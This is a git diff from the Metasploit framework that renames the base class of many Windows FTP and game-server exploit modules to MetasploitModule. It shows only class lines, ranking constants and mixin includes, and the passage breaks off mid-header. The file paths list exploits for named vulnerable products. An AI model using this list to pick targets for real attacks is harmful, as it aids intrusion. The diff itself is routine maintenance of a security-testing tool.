a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 6ae2f48820..f4e9760d84 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index 86675200e1..266e3fc0fa 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb index da254de1d6..13a3d851d9 100644 --- a/modules/exploits/windows/ftp/ability_server_stor.rb +++ b/modules/exploits/windows/ftp/ability_server_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb index c740472f19..7eb93075e6 100644 --- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb +++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/bison_ftp_bof.rb b/modules/exploits/windows/ftp/bison_ftp_bof.rb index 4e71775798..ffff7db5ed 100644 --- a/modules/exploits/windows/ftp/bison_ftp_bof.rb +++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 0026fb5b96..68622d600e 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index ae905a9acd..207d0f486d 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 2c2707a2c7..e0a1ab643f 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index 6223524b5b..1e4f688b9b 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index db15f4a362..2ced587670 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 07c9cb90fc..67dce18c44 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 7991c3fe5c..fef06a6196 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index d876af7908..dbbe479d36 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index 2757eadf85..763701eddd 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 3352b4407e..1a21d31d2b 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index ab833037cc..31e7f97f65 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index d39a39495b..15638bd5ee 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index ff40940d5e..dfd218bd16 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index 68b913acbc..4a3f5c083e 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index f8fc0893db..51f8a6e1bd 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 4f8df2009c..31744286f0 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 91809dba78..1a10e1d0e6 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index 754d9afd7e..43328997c2 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 497c2049ad..57bb580aac 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index e90f25e4ba..390c85c097 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index 5adb8fc2fb..4afa3776fd 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb index 2799facccc..bf75081bac 100644 --- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb +++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index a27b61a9ed..824d7e0e35 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index b1b03bb545..a0be93b3b8 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 9345aca081..a9cf6d302a 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index e1404937dd..df8a083f4a 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 5d672e54ec..afe59385b0 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 53fd3231d5..92f731b177 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 6bd6afcda3..592bad109b 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 99b39220b0..aa1c8cb6d8 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb index 10ea810e86..9ec9e76e93 100644 --- a/modules/exploits/windows/ftp/pcman_stor.rb +++ b/modules/exploits/windows/ftp/pcman_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 91cf132b9e..c5565db2f1 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index 043b6c2ccf..343134c41c 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ricoh_dl_bof.rb b/modules/exploits/windows/ftp/ricoh_dl_bof.rb index 2977243b78..0d36500d61 100644 --- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb +++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index c07761fbd2..ffc7d788f1 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 48bdbf0d8a..6f204555fd 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index 0499103f04..42d0bf5062 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 0c8492f50e..7eb04fa0c4 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index eaf8b779f9..a3bfa6be94 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 3439995d2c..6d5bcdc0ca 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 75c3f1fa63..eb547b3b9a 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index dca878528b..5be79c2078 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index de59a26cc6..0ed324112a 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 92ff75127d..57a026c205 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index b587adc4f6..18fc0971bb 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 1b8205a688..7c797946c4 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 3dbe048b51..4337793eac 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index 1542008c2b..109c13a220 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index edefcd67a2..e333456c17 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index d5bcefe4af..4ecd12e46f 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index aef6f65f7d..e73dc1f1e4 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index e4a300eca7..56db38b8d8 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 3ae6ee1c56..fac246c6f9 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 3b3d16a5ae..89ce3fd299 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 406afdf4dc..6589171d8d 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index e5dc86d847..5a4354bc73 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index c586e98158..e0349a6926 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ 